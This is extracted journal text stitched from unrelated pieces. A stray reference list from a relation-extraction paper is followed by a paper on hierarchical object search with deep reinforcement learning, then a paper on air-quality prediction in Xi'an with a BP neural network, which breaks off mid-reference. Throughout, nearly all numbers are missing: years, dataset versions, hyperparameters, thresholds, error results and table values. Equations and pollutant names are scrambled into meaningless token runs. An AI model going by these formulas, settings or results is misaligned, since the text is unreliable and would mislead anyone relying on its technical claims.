chinese social media with word segmentation representation learning. in proceedings of the fifty-fourth annual meeting of the association for computational linguistics. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word repre- sentation. in proceedings of the conference on empiri- cal methods in natural language processing. hoifung poon, chris quirk, charlie deziel, and david heckerman. . literome: pubmed-scale genomic knowledge base in the cloud. bioinformatics, ( ). hoifung poon, kristina toutanova, and chris quirk. . distant supervision for cancer pathway extraction from text. in pacific symposium on biocomputing. longhua qian, guodong zhou, fang kong, qiaoming zhu, and peide qian. . exploiting constituent dependencies for tree kernel-based semantic relation extraction. in proceedings of the twenty-second inter- national conference on computational linguistics. chris quirk and hoifung poon. . distant supervi- sion for relation extraction beyond the sentence bound- ary. in proceedings of the fifteenth conference on european chapter of the association for computational linguistics. chris quirk, pallavi choudhury, jianfeng gao, hisami suzuki, kristina toutanova, michael gamon, wen-tau yih, and lucy vanderwende. . msr splat, a language analysis toolkit. in proceedings of the confer- ence of the north american chapter of the association for computational linguistics: human language tech- nologies, demonstration session. kevin reschke, martin jankowiak, mihai surdeanu, christopher d manning, and daniel jurafsky. . event extraction using distant supervision. in proceed- ings of eighth edition of the language resources and evaluation conference. michael roth and mirella lapata. . neural semantic role labeling with dependency path embeddings. in proceedings of the fifty-fourth annual meeting of the association for computational linguistics. cicero nogueira dos santos, bing xiang, and bowen zhou. . classifying relations by ranking with convolutional neural networks. in proceedings of the fifty-third annual meeting of the association for com- putational linguistics. franco scarselli, marco gori, ah chung tsoi, markus hagenbuchner, and gabriele monfardini. . the graph neural network model. ieee transactions on neural networks, ( ). richard socher, brody huval, christopher d manning, and andrew y ng. . semantic compositionality through recursive matrix-vector spaces. in proceedings of the joint conference on empirical methods in natu- ral language processing and computational natural language learning. fabian m suchanek, georgiana ifrim, and gerhard weikum. . combining linguistic and statistical analysis to extract relations from web documents. in proceedings of the twelfth international conference on knowledge discovery and data mining. mihai surdeanu and ji heng. . overview of the english slot filling track at the tac knowledge base population evaluation. in proceedings of the u.s. national institute of standards and technology knowl- edge base population workshop. kumutha swampillai and mark stevenson. . extract- ing relations within and across sentences. in proceed- ings of the conference on recent advances in natural language processing. kai sheng tai, richard socher, and christopher d man- ning. . improved semantic representations from tree-structured long short-term memory networks. in proceedings of the fifty-third annual meeting of the association for computational linguistics. theano development team. . theano: a python framework for fast computation of mathematical ex- pressions. arxiv e-prints, abs/ . . linlin wang, zhu cao, gerard de melo, and zhiyuan liu. . relation classification via multi-level attention cnns. in proceedings of the fifty-fourth annual meet- ing of the association for computational linguistics. michael wick, aron culotta, and andrew mccallum. . learning field compatibilities to extract database records from unstructured text. in proceedings of the conference on empirical methods in natural language processing. kun xu, yansong feng, songfang huang, and dongyan zhao. a. semantic relation classification via convolutional neural networks with simple negative sampling. in proceedings of conference on empirical methods in natural language processing. yan xu, lili mou, ge li, yunchuan chen, hao peng, and zhi jin. b. classifying relations via long short term memory networks along shortest dependency paths. in proceedings of conference on empirical methods in natural language processing. yan xu, ran jia, lili mou, ge li, yunchuan chen, yangyang lu, and zhi jin. . improved relation classification by deep recurrent neural networks with data augmentation. in proceedings of the twenty-sixth international conference on computational linguis- tics. nianwen xue, hwee tou ng, sameer pradhan, rashmi prasad, christopher bryant, and attapol rutherford. . the conll- shared task on shallow dis- course parsing. in proceedings of the conference on computational natural language learning, shared task. katsumasa yoshikawa, sebastian riedel, tsutomu hi- rao, masayuki asahara, and yuji matsumoto. . coreference based event-argument relation extraction on biomedical text. journal of biomedical semantics, ( ). daojian zeng, kang liu, siwei lai, guangyou zhou, jun zhao, et al. . relation classification via convo- lutional deep neural network. in proceedings of the twenty-sixth international conference on computa- tional linguistics. daojian zeng, kang liu, yubo chen, and jun zhao. . distant supervision for relation extraction via piecewise convolutional neural networks. in proceedings of the conference on empirical methods in natural language processing. shu zhang, dequan zheng, xinchen hu, and ming yang. . bidirectional long short-term memory networks for relation classification. in proceedings of twenty- ninth pacific asia conference on language, informa- tion and computation. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - hierarchical image object search based on deep reinforcement learning wei zhang school of computer science and engineering xi'an technological university xi'an, china e-mail: weivanity@ gmail.com hongge yao school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com yuxing tan school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com abstract—object detection technology occupies a pivotal position in the field of modern computer vision research, its purpose is to accurately locate the object human beings are looking for in the image and classify the object. with the development of deep learning technology, convolutional neural networks are widely used because of their outstanding performance in feature extraction, which greatly improves the speed and accuracy of object detection. in recent years, reinforcement learning technology has emerged in the field of artificial intelligence, showing excellent decision-making ability to deal with problems. in order to combine the perception ability of deep learning technology with the decision-making ability of reinforcement learning technology, this paper incorporate reinforcement learning into the convolutional neural network, and propose a hierarchical deep reinforcement learning object detection model. keywords-object detection; deep learning; reinforcement learning i. introduction when observing a picture, humans can immediately know the location and category of the object in the image, and can get the information without even thinking too much. this is a breeze for us, but the computer cannot have all kinds of complicated ideas of our human brain, and it is not easy to realize it. in computer vision, the positioning and retrieval of images will be affected by two aspects, one is the content of the image, and the other is the pros and cons of the algorithm. there are two main factors influencing the image. the first is that the background and light when taking pictures will affect the quality of the image, resulting in a decrease in the accuracy of object detection. the second is the content of the image. if there are several similar objects, or some are mailto: @qq.com international journal of advanced network, monitoring and controls volume , no. , blocked by other objects, and the different angles of the object will affect the accuracy of detection. the algorithm mainly focuses on how to make the features have higher quality. therefore, how to design an algorithm that can satisfy accurate positioning and continuously improve the object positioning speed is the key to research. for computers, these pictures are data collections which are composed of binary digits, and the things behind the data cannot be imagined by computers. our purpose is to let the computer simulate our human vision and simply have the ability to process the image. human beings get a lot of information in real life every day, and most of them belongs to the information transmitted to us by vision, and only part of the information in these visual images is what human need. therefore, by extracting the important information, positioning and identifying them accurately, human can greatly reduce the amount of data that the computer needs to process and improve the efficiency of data processing. reinforcement learning is an important field in machine learning. it constructs a markov decision process and simulates human thinking to teach agents how to make actions that can obtain high reward values in the environment, and find the best strategy to solve the problem in such constant interaction. based on this idea, this paper use reinforcement learning technology to simulate the human visual attention mechanism. the agent is taught to change the shape of the bounding box and focus only on a significant part of the image at a time, and then extract its features through the convolutional neural network. finally, the object of image positioning and classification can be achieved. ii. related work a. traditional object detection algorithm traditional object detection algorithms include primary feature extraction methods such as hog feature extraction of objects and training svm classifiers for recognition. their algorithms are generally divided into three stages (see figure .): ) select different sliding window frames according to the size of the object, and use the sliding window to select a part of the content in the figure as a candidate area. ) extract visual features from candidate regions. ) use svm classifier for identification. figure . traditional object detection algorithm the traditional object search algorithm has the following disadvantages: ) the selection strategy based on sliding windows is to slide across the entire image from beginning to end. for different object sizes, the program need windows with different size ratios to traverse. although it can mark all the positions of the object, its brute-force enumeration search results in extremely high time complexity and a large number of windows that are not related to the object, so the speed and performance of feature extraction and classification have fallen into a bottleneck. ) the characteristics of each object are different, which leads to the diversity of forms, and the background factors of each object will also affect the accuracy of recognition. therefore, the features of manual design are not very robust. input image region selection feature extraction classification international journal of advanced network, monitoring and controls volume , no. , b. object detection algorithm based on deep learning after the appearance of cnn, it has been widely used in the field of computer vision. with the continuous development of science and technology, the difficulty of obtaining a large amount of sample data has been significantly reduced, and the continuous improvement of computing capabilities has enabled cnn to have the ability to extract features from a large amount of data, which has made huge gains in computer vision. aiming at the shortcomings of traditional method for object detection, the object detection algorithm based on deep learning uses cpmc, selective search, mcg, rpn and other methods to generate candidate regions instead of window sliding strategy. these methods usually use various details of the image, such as image contrast, edge parts and color to extract higher-quality candidate regions, while reducing the number of candidate regions and time complexity. this type of object detection method is generally divided into two types: one-stage detection algorithm and two-stage detection algorithm. the one-stage detection algorithm regards the object detection problem as a regression problem and directly obtains the category and position information of the object. the detection speed of the algorithm is fast, but the accuracy is low. the two-stage detection algorithm first generates a large number of region proposals, and then classifies these region proposals through the convolutional neural network, so the accuracy is higher, but the detection speed is slower. c. object detection algorithm based on deep reinforcement learning in recent years, research on deep reinforcement learning has emerged endlessly. it has achieved excellent performance in many games than human master players, especially the success of the deepmind team on the alphago project, pushing deep reinforcement learning to a new height. in this context, many researchers try to apply deep reinforcement learning technology in the field of object detection. in , caicedo et al. adopted a top-down search strategy, analyzed the entire scene at the beginning, and then continued to move toward the object location. that is, use a larger bounding box to frame the object, and then shrink it step by step, eventually making the object surrounded by a compact bounding box. in , mathe et al. proposed an image-based sequence search model to extract image features from a small number of pre-selected image positions in order to efficiently search for visual objects. by formulating sequential search as reinforcement learning of the search policy, their fully trainable model can explicitly balance for each class, specifically, the conflicting goals of exploration - sampling more image regions for better accuracy -, and exploitation - stopping the search efficiently when sufficiently confident about the object's location. the above algorithm models all use reinforcement learning techniques to improve deep learning algorithms, and all have achieved good results. however, if the visual object algorithm is required to have a relatively high accuracy, it still needs to rely on a large number of candidate regions, so our research direction is to reduce the number of candidate regions while maintaining the quality of the candidate regions at a high level. iii. hierarchical object search model based on drl a. mdp formulation this paper regard object detection as a markov decision process, and find an effective object detection strategy by solving decision problems. in each process, the agent interacts with the current environment based on the current state, and decides the next search action, and gets an instant reward value. the agent continuously improves the efficiency of search in the international journal of advanced network, monitoring and controls volume , no. , process of learning to obtain high cumulative reward value. there are different actions in action space a, which are composed of two different types: select action and stop action. the selection action is to frame a part of the current area as the next observation area. it consists of four borders and a center frame, which respectively reduce the current search area to different sub-regions (see figure .); the stop action indicates that the object has been found, so the bounding box is no longer changed, and the search process stops. in reinforcement learning, the state is the premise and basis for the agent to make actions. in this model, the state is composed of two aspects. one is the feature vector extracted by the convolutional neural network in the current state. the other is the historical action information performed in the process of searching for the object. this information helps to stabilize the search trajectory, so that the search process will not fall into the loop search, thereby improving the accuracy of the search. figure . the selection action diagram figure . sample generation process diagram based on markov decision process the function of the reward is to reflect the reaction obtained by the agent during the interaction with the environment. the agent judges the merits of the action according to the different rewards received, and finally learns the strategy by maximizing the cumulative reward. since the agent have two types of actions, our calculation methods are different depending on the type of action. the reward obtained by the agent depends on the action it takes in the current state. the model use to evaluate the effect of the action, so that the accuracy of detection can be obtained. this paper take as the observation area after the movement, as the observation area before the movement, and as the area of the object area, is the reward obtained after making the selection action, then our reward function can be expressed for: ( ) if the difference of the overlap rate is positive, it means that our prediction range is closer to the object international journal of advanced network, monitoring and controls volume , no. , area, if it is negative, it means that the prediction range is farther from the object area. if the decision improves the detection accuracy, the reward is positive, otherwise the reward is negative. the model use as the reward function for the stop action, and set the reward value for the stop action as . at the same time, the program need to add a threshold to determine when it will end the action. when the value of is greater than the threshold, indicating that object has been found, then the program can end the search and perform the stop action. at the same time as there is a reward process, there is also a punishment when continues to fall below the threshold and reaches the maximum number of searches. so that the agent knows the wrong process and corrects it. the reward function for the stop action is as follows: ( ) b. dqn algorithm the model use three fully connected layers to form the q-network, its input is the information content of the image, and the activation values of the neurons in the output layer represent the confidence of kinds of actions, among which the highest confidence corresponding action is selected. according to the state, action and reward function, the agent apply the q-learning algorithm to learn the optimal strategy. because the input image is a high-dimensional data, this paper use to approximate the q function in high dimensions. the q function based on strategy π is expressed as follows: ( ) the agent selects the action with the highest q value from the q function, and uses the bellman equation to continuously update the q function: ( ) among them, is the current state, is the selected action in the current state, is the immediate reward, is the discount factor, indicates the next state, and indicates the next action to be taken. in order to train , the program need a large number of training samples which are usually continuously sampled (see figure .), but the continuity between adjacent samples will cause inefficiency and instability of q-network learning. this paper use the experience-replay mechanism to solve this problem. when the capacity of the experience pool tends to be saturated, the program constantly replace the old samples with new samples. at the same time, in order to make most of the samples selected with nearly the same probability, the program randomly extract samples in the experience pool. the loss function of the training process is set as follows: ( ) among them, is the actual output of the network, is the expected output of the network, is the current reward value, is the maximum expected reward value for the next decision, is the discount factor. c. hierarchical object search process the initial candidate region of the model is the entire image. the size of the candidate region is normalized to a fixed size, and then put into a trained international journal of advanced network, monitoring and controls volume , no. , cnn neural network model to extract feature values, and then rely on the greedy algorithm to use the probability randomly select one of all actions to search, or use the learned strategy to make action decisions with a probability of . after the model made action , it switched to a new candidate area which is a sub-region of the previous region, according to the reward function to give our agent the corresponding reward , and at the same time normalize the new candidate area and put it into the neural network model for features extraction, combine with previous actions to get a new state . repeat the above hierarchical process continuously until our action becomes a stop action, or the number of search steps reaches the upper limit. if a stop action occurs, the final reward is given according to its corresponding termination reward function. iv. experiment a. data sets and parameter settings use the pascal voc data set to train the model, which is the most used data set for object detection. the training set uses the combination of pascal voc and pascal voc , and the test set uses the pascal voc test set. the model use three fully connected layers to form a q-network. its input is the information content of the image. the activation values of neurons in the output layer represent the confidence of actions. the parameters of the network are initialized by a standard normal distribution function. the initial value of the greedy factor is , every iteration, the decreases by . , and stops when it decreases to . . set the size of the experience pool to , the reward discount coefficient to . , and the threshold to make the stop action is . . b. experimental results and analysis ● model training in the process of training the model, the value of the loss function is continually declining along with the continuous iteration of the neural network, making the neural network tend to converge (see figure .). when the number of training times reaches a certain level, the loss value tends to be stable, and various parameters in the network are also updated, forming a neural network model with recognition capabilities. figure . schematic diagram of loss function international journal of advanced network, monitoring and controls volume , no. , ● results and analysis the model first analyzes the entire picture and finds the object through a series of frame transformation actions. finally, the agent make the stop action indicate the end of the search. the following figure shows this hierarchical dynamic selection process in detail. figure . hierarchical dynamic selection process experimental results show that the algorithm model proposed in this paper can improve the search speed and accuracy in object search. however, it can also be seen from the experiment that there may still be errors in the match between the object prediction frame and the actual bounding box of the object, because the model can only continue to select from the area selected by the previous bounding box. as a result, the predicted bounding box cannot reach other areas of the image. the model can improve the detection result by changing the appropriate proportion of the framed area. v. conclusion this paper propose an object detection model based on deep reinforcement learning, which focuses on international journal of advanced network, monitoring and controls volume , no. , different areas of the picture by performing a predefined area selection action, and iterates the process to make the bounding box tightly surround the object, finally achieved the positioning and classification of object. experiments show that the model can effectively detect the object in the image. references [ ] sutton r s, barto a g. reinforcement learning: an introduction[m]. mit press, . [ ] gagniuc p a. markov chains: from theory to implementation and experimentation[m]. john wiley & sons, . [ ] hu y, xie x, ma w y, et al. salient region detection using weighted feature maps based on the human visual attention model[c]//pacific-rim conference on multimedia. springer, berlin, heidelberg, : - . [ ] ren s, he k, girshick r, et al. faster r-cnn: towards real-time object detection with region proposal networks[c]//advances in neural information processing systems. : - . [ ] lecun y, bottou l, bengio y, et al. gradient-based learning applied to document recognition[j]. proceedings of the ieee, , ( ): - . [ ] dalal n, triggs b. histograms of oriented gradients for human detection[c]// ieee computer society conference on computer vision and pattern recognition (cvpr' ). ieee, , : - . [ ] boser b e, guyon i m, vapnik v n. a training algorithm for optimal margin classifiers[c]//proceedings of the fifth annual workshop on computational learning theory. : - . [ ] papandreou g, kokkinos i, savalle p a. modeling local and global deformations in deep learning: epitomic convolution, multiple instance learning, and sliding window detection[c]//proceedings of the ieee conference on computer vision and pattern recognition. : - . [ ] carreira j, sminchisescu c. cpmc: automatic object segmentation using constrained parametric min-cuts[j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] uijlings j r r, van de sande k e a, gevers t, et al. selective search for object recognition[j]. international journal of computer vision, , ( ): - . [ ] pont-tuset j, arbelaez p, barron j t, et al. multiscale combinatorial grouping for image segmentation and object proposal generation[j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] silver d, huang a, maddison c j, et al. mastering the game of go with deep neural networks and tree search[j]. nature, , ( ): - . [ ] caicedo j c, lazebnik s. active object localization with deep reinforcement learning[c]//proceedings of the ieee international conference on computer vision. : - . [ ] mathe s, pirinen a, sminchisescu c. reinforcement learning for visual object detection[c]//proceedings of the ieee conference on computer vision and pattern recognition. : - . [ ] watkins c j c h, dayan p. q-learning[j]. machine learning, , ( - ): - . [ ] mnih v, kavukcuoglu k, silver d, et al. playing atari with deep reinforcement learning[j]. arxiv preprint arxiv: . , . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - analysis and forecast of urban air quality based on bp neural network wenjing wang school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com shengquan yang school of computer science and engineering xi'an technological university xi'an, china e-mail: xaitysq@ .com abstract—the rapid economic development has led to the declining quality of the atmospheric environment. at present, my country is facing a very serious problem of atmospheric environmental pollution. accurate prediction of air quality plays a vital role in the realization of air pollution control by environmental protection departments. based on the historical air pollution concentration data, this paper establishes a bp neural network model to learn the statistical law of air pollutant values to realize the prediction of air quality in the future. through the analysis of the target of air quality prediction, the design of an air quality prediction method based on bp neural network is designed. this method includes four stages: air pollutant concentration data collection, data processing, air quality index calculation, and prediction network construction. the experimental results show that the air quality prediction method based on bp neural network designed and implemented in this paper, combined with the developed air quality prediction system, can effectively predict the recent changes in air quality and various air pollutant concentrations. by collecting the concentration data of air pollutants and learning the changes of air pollutants to achieve air quality prediction, it provides a quantitative reference for government environmental protection departments to achieve air pollution control. keywords-aqi; air quality prediction; bp neural network i. introduction air quality prediction, as the name suggests, is based on the historical emission concentration values of various pollutant items in the air to predict the concentration values of various pollutants in the air pollution in the future and the air environment quality[ ]. as china's rapid economic development has led to serious atmospheric environmental pollution problems, the state and the public have paid more and more attention to the treatment and prevention of air pollution. the government environmental protection department hopes to keep abreast of the details of local air pollution and the recent changes in air pollution. the public also hopes to be able to understand the impact of air quality around them on their health in time. in recent years, the state has increased its plans for ecological environmental protection, and the plan clearly clarified that atmospheric pollution control is one of the key contents. the environmental protection departments of local governments strengthen air pollution control work, hoping to understand the changes in air quality in a timely manner by establishing an air quality prediction model. international journal of advanced network, monitoring and controls volume , no. , xu dahai proposed an atmospheric advection diffusion box model in , in which the concept of the air pollution potential index was clearly determined, which effectively improved the accuracy of potential prediction on the basis of existing research [ ]. in , liu shi proposed a statistical model for potential prediction based on the air pollution of changchun city. the model achieved a certain prediction effect [ ]. but generally speaking, the accuracy of the potential prediction is very low, so it needs to be used together with other prediction methods, and cannot be used alone. the chemical model for high resolution of the troposphere in the atmosphere established by lei xiaoen is a typical numerical prediction model. using this numerical prediction model can realize the prediction of the changing process of air pollutants in the atmosphere [ ]. due to its own characteristics, numerical prediction requires detailed geographic, meteorological, and pollution sources to realize the air quality prediction process. collecting these data in actual situations requires huge costs and is difficult to obtain. in addition, numerical prediction models require high the amount of hardware computing resources is used to calculate the change trend of air pollution at high speed. the calculation complexity is high and it takes a long time, so the current numerical prediction model is not popular in small and medium-sized cities. taiwan’s pai uses a gray model to achieve air quality prediction. the final actual results show that this method can achieve good results in achieving air quality prediction [ ]. the time series analysis method and multiple regression model method in the statistical prediction method simplifies many change factors that affect air quality in the process of achieving air quality prediction, and makes many assumptions in the training process to achieve prediction, and finally achieves air quality the accuracy of the prediction needs to be further improved. the neural network has a good approximation effect in air quality prediction. it can continuously update the newly acquired air pollutant information to the neural network, update the prediction model in time, and improve the prediction accuracy. the neural network has a strong performance in air quality prediction. dynamic adaptability and fault tolerance. in his research, wang jian pointed out that the bp neural network has advantages that other methods do not have in problems such as air quality prediction [ ]. this paper uses air quality prediction based on bp neural network, and builds a neural network model to achieve air quality prediction, providing government environmental protection departments with air pollution trends. ii. air quality related factors aqi is the abbreviation of air quality index. aqi does not refer to the value of a specific pollutant project, but reduces the concentration of the six air pollutant projects s , n , o , co, pm . and pm to a single concept. sex index form, used to represent the overall situation of air quality [ ]. according to the size of the aqi value, the air pollution situation can be divided into different levels, and different air quality levels indicate the overall air quality in the local area over a period of time. the goal of this research is to make a short-term prediction of aqi in xi'an, select the six main pollutant concentrations of aqi as features, build an air quality prediction model, improve the prediction accuracy and efficiency of the air quality prediction model, and provide environmental monitoring and governance provide accurate air quality information. in terms of data set acquisition, the air quality pollutant concentration data comes from the weather post website. using web crawler technology to crawl the data of the website’s air quality data module, the data from october to december can be obtained. relevant feature data, after preprocessing the feature data to form an experimental data set. the original data does not necessarily meet the needs of the prediction model. the original data often needs to be processed before the training model is constructed, so international journal of advanced network, monitoring and controls volume , no. , that the collected original data meets the needs of the model. this paper studies the air quality prediction method, and the construction of the air quality prediction model mainly needs to consider the lack of data processing, data outlier processing, and data normalization processing. in this paper, the mean value filling method is used to deal with missing values. the mean value filling method is to replace the missing values with the average value of historical data. this method is simple to implement and suitable for models with high accuracy requirements. data anomaly refers to an unreasonable value in a data set. for example, taking air pollutant concentration data as an example, if the actually collected concentration data value is a negative number, the value is determined to be an abnormal value. in the research method of this paper, the outliers are regarded as missing values, and the outliers are dealt with in the way of missing values. in order to avoid the overflow of the weight of the neural network is too large or too small, to eliminate the possible impact of different variables of the input vector due to different dimensions or too large difference in value, the input vector of the neural network needs to be processed. normalized data processing is performed on the collected original data set, so that each index of each element data of the vector is at the same order of magnitude, which is suitable for training model for learning. this article uses the z-score standardized method, the calculation method is: δ μ*   x x ( ) among them, is the mean value of all sample data, and is the standard deviation of all sample data. iii. air quality prediction model a. bp neural network bp neural network is an error back propagation neural network. rumerlhar proposed an error back propagation algorithm in the study of forward neural network, referred to as bp neural network algorithm. the network of each layer of the bp neural contains many neuron nodes. there is no connection between the neurons in the layer, and all the neuron nodes between adjacent layers are fully connected [ ]. the input layer is used to accept network input information. each neuron will generate the corresponding link weight according to the input information of the obtained network. the function of the hidden layer in the bp neural network is information detection. according to tambe’s global approximation theory, even if a neural network contains only one hidden layer, as long as there are enough neuron nodes and the appropriate connection function and weight are selected, it can be arbitrary. approximate the input and output vector of a measurable function [ ]. the bp neural network can obtain information and continuously update it to the network, and constantly adjust its structure to meet the characteristics of the model, and has strong self-adaptability and fault tolerance. the bp neural network learning process is that after receiving the initial input and the given target output, the information forward propagation learning process is performed. this process first calculates and calculates each neural unit of the input layer and each neural unit of the hidden layer. obtain the output of each neural unit of the hidden layer, and then use the same method to calculate the output of each neural unit of the output layer to determine the error between the actual output of the output layer and the target output. if the error value is within the user's acceptable range, then fix the weight and threshold, and end the training, otherwise it enters the second stage. the second stage is the error signal back-propagation stage. in this stage, the partial derivative of the error is first calculated μ δ international journal of advanced network, monitoring and controls volume , no. , using the output of the output layer, and then the partial derivative obtained by calculation is weighted and summed with the previous hidden layer. input layer, and finally use the partial derivative calculated by each neural unit to update the weight [ ]. repeat these two stages until the error between the actual output and the target output is reduced to an acceptable range. figure is the learning flowchart of the bp neural network: begin provide initial input and target input calculate the output of each unit of the hidden layer calculate the output of each unit in the output layer calculate the error between the actual output and the target value whether the error is within the allowable range fixed weights and thresholds end update the connection weight of each layer adjust the connection weight of the input layer to the hidden layer and the output threshold of each unit of the hidden layer calculate hidden layer correction error calculate the output layer correction error yes no figure . bp neural network learning process from the above, the algorithm flow of bp neural network can be divided into two processes, as follows: ) forward propagation sub-process it is now defined that the input value of the input layer node is i x , the weight value between the input layer and the hidden layer node is ih w ; the threshold value of the hidden layer node is h b and the value between the hidden layer and output layer node is ho w ; output the threshold of the layer node is o b , the network activation function is f , the output value of the output layer node is o yo , and the expected output value is o y . the forward propagation process of the bp neural network is to solve the output layer output value i x from the input layer input value o yo . specific steps are as follows: a) calculate the input and output values of the hidden layer hidden layer input value:    m i hiihh bxw hi (h= , ,...,n) ( ) hidden layer output value: )(h hh hifo  (h= , ,...,n) ( ) b) calculate the input value and output value of the output layer input value of output layer:    k o ohhoo bhow yi (o= , ,...,k) ( ) output value of output layer: )( oo yifyo  (o= , ,...,k) ( ) ) back propagation sub-process international journal of advanced network, monitoring and controls volume , no. , the back propagation process of bp neural network is based on widrow-hoff learning rules. the error function is as follows:    k o o yoywe )( b),( ( ) the main goal of the bp neural network algorithm is to iteratively modify the weights and thresholds between layers so as to minimize the value of the error function. according to the widrow-hoff learning rule, along the direction of the steepest descent of the sum of squared errors, the weights and thresholds are constantly adjusted. according to the gradient descent method, the amount of weight change is proportional to the gradient of the error function at the current position, as shown in equation ( ): w we w    )b,(  ( ) also for thresholds are: b we    )b,( b  ( ) in the formula:  ,  is the learning speed, and its value range is ( , ). the specific steps of the bp neural network back propagation process are as follows: a) calculate the weight between the hidden layer and the output layer and adjust the threshold of the output layer for ho w , according to formula ( ), we can get: ho o oho w yi yi e w bwe w         ho ),(  ( ) from formulas ( ), ( ), and ( ), we can get: h ho o ho w   y i ( ) o ' )()( yi    oo o yifyoy e ( ) from formulas ( ), ( ), ( ), we can get: hhow o ho  ( ) similarly, we can get: o b  o ( ) b) calculate the weight between the input layer and the hidden layer and the adjustment amount of the hidden layer threshold for ih w , according to equation ( ): ih h hih w hi hi e w bwe w         ih ),(  ( ) since h hi affects all output layers, there are:          k i h o oh hi yi yi ee hi ( ) from formulas ( ) and ( ), we can get: international journal of advanced network, monitoring and controls volume , no. , )( yi ' hho h o hifw hi    ( ) from formula ( )、( )、( ), we can get:      k o hhooh o whif e ' )( hi  ( ) from equations ( ), ( ) and ( ), we can get: ih h w w    hi h ih  ( ) similarly, we can get: h hb  ( ) c) update the weights and thresholds of the bp neural network from ( ), ( ), the updated weight and output layer threshold between the hidden layer and the output layer are: ho n ho n howw  ho   ( ) o n o n o b  b   ( ) from equations ( ) and ( ), the updated weights and hidden layer thresholds between the input layer and the hidden layer can be obtained: ih h h n ih n w hi ww      ih ( ) h n h n h b  b   ( ) b. design of air quality prediction model the core algorithm used in this paper is the bp neural network algorithm. according to the characteristics of the bp neural network, this topic needs to determine the number of neuron nodes in each layer of the network, and select the network activation function and initial parameters. the determination of the number of input layer nodes of the bp neural network is very important. too many or too few selections will affect the prediction accuracy of the model. therefore, the number of input layer nodes should be determined according to the actual application needs. this subject designs the input layer and output layer of the network based on the collected data. the number of input layer nodes is , which are the data of the concentration values of six pollutants such as pm . , pm , so , no , c , and o in a day. the number of nodes in the output layer is one, that is, the aqi value of the next day. the structure of the bp neural network in this subject is divided into three layers, with only one hidden layer. there is no theoretical guidance for determining the number of hidden layer nodes, and it is usually based on specific practical experience. the empirical formula for selecting the number of hidden layers is:  qnp ( ) in the formula, n and q represent the number of neurons in the input layer and output layer, respectively, generally take an integer between - . the number of hidden layer nodes in this subject is first determined as . the network activation function is an important factor that affects the performance of the bp neural network algorithm, which makes the network have nonlinear processing capabilities. there are three activation functions of bp neural network: log-sigmiod function, tanh function and relu function. according to the characteristics of the research data and the international journal of advanced network, monitoring and controls volume , no. , characteristics of the three activation functions, in this paper, the hidden layer of the bp network selects the log-sigmiod function as the activation function, and the output layer selects the relu function as the activation function. since the sample data is normalized, the value interval between the initial weight and the threshold is between [- , ], and they should be a set of random numbers that are not exactly equal. figure . log-sigmiod function figure . relu function iv. experiment the experimental simulation platform used in this article is the python programming language. the air data object used in the experiment is the air quality data of xi'an from october to december . all the experimental data are sorted in a continuous time series. take the data for consecutive days as the test data set, and the other as the training data set. for the evaluation of the advantages and disadvantages of the model, this paper uses the average error and the root mean square error to evaluate. the calculation formulas are shown in equations ( ) and ( ):     n i i ii y yy n mape * || ( )    n i ii yyrmse * )( n ( ) experimental results show that the prediction model established in this paper has high accuracy and high efficiency for pm . concentration prediction. the simulation prediction results are shown in figure the measured values and predicted values of the first groups are compared to obtain table . table i. comparison between measured and predicted aqi aqi prediction pm . pm so no co o . . . . . . . . . . . . figure . comparison of sample prediction results with real values the experimental results show that, after analyzing the prediction results, it is concluded that under the experimental conditions given in this paper, the average error of the experimental results is . and the root mean square error is . . as can be seen from figure - and table - , the bp neural network established in this paper has lower prediction error when the air quality fluctuates greatly. aqi measured aqi prediction international journal of advanced network, monitoring and controls volume , no. , this research also has some shortcomings at present. it only considers the relevant factors that can be quantitatively analyzed, and does not take into account some unexpected emergencies. for example, natural disasters, human factors, etc. due to the unpredictable and unquantifiable characteristics of these factors, they have not been considered in the article. in the future research work, we hope to analyze these factors. v. conclusion this article aims at the current situation of severe air pollution problems facing china. the traditional air pollutant online monitoring system cannot effectively use historical air pollutant data to provide quantitative reference for air pollution control and various control measures. the environmental protection department urgently needs to establish an air quality prediction system to realize the supervision and control of local air pollution. this paper studies a method to achieve air quality prediction based on bp neural network. by studying the change law of historical air pollutant project concentration data, it predicts the future air quality change trend for a period of time, and helps government environmental protection departments formulate air pollution control policies to provide quantification indicators and references. this article first explains the research background and significance of this topic, and analyzes the necessity of establishing an air quality prediction system for air pollution control. based on the analysis of the domestic research results of air quality prediction, combined with the regional characteristics and actual conditions of prefectural and municipal government departments, a framework model for air quality prediction based on statistical prediction is proposed. then, an air quality prediction method model based on bp neural network is established, and the realization of the method includes three stages of air pollutant project concentration data collection, data processing, and prediction algorithm network model construction. this paper uses bp neural network to predict the air quality in xi'an. through the analysis of experimental results, bp neural network has a significant effect in dealing with such nonlinear problems, especially in the place where the aqi fluctuation is relatively large. the research is conducive to the prediction and prevention of air pollution problems. the government can also make appropriate measures and decisions based on the prediction results, such as closing schools or reducing outdoor sports, thereby reducing the damage caused by pollution. it can also provide new ways and methods for forecasting research in other fields. acknowledgment the research is supported by the new network and detection control national and local joint engineering laboratory. (financing projects no. gsysj ). references [ ] ren wanhui, su zongzong, zhao hongde. advances in the study of urban environmental air pollution forecasting [j]. environmental protection science, , ( ): - . [ ] xu dahai, zhu rong. popularization and application of urban air pollution forecasting model [j]. annual report of cams, ( ): . [ ] liu shi, wang ning, zhu qiwen, wang xinguo, hu zhongming, chen changsheng. research on the statistical model of air pollution potential forecast in changchun city [j]. meteorology, ( ): - . [ ] han zhiwei, du shiyong, lei xiaoen, ju lixia, wang qingeng. urban air pollution numerical prediction model system and its application [j]. chinese environmental science, ( ): - . [ ] tzu‐yi pai,keisuke hanaki,ren‐jie chiou. forecasting hourly roadside particulate matter in taipei county of taiwan based on first‐order and one‐variable grey model [j]. john wiley & sons, ltd, , ( ). [ ] wang jian, hu xiaomin, zheng longxi, liu zhenshan. research on air pollution forecasting method based on bp model [j]. environmental science research, ( ): - . [ ] wang qingeng, xia sijia, wan yixue, jin longshan. problems and new ideas in current urban air pollution forecasting methods [j]. environmental science and technology, , ( ): - . [ ] a. elkamel, s. abdul-wahab, w. bouhamra, e. alper. measurement and prediction of ozone levels around a heavily industrialized area: a neural network approach [j]. advances in environmental research, , ( ). [ ] jaakko 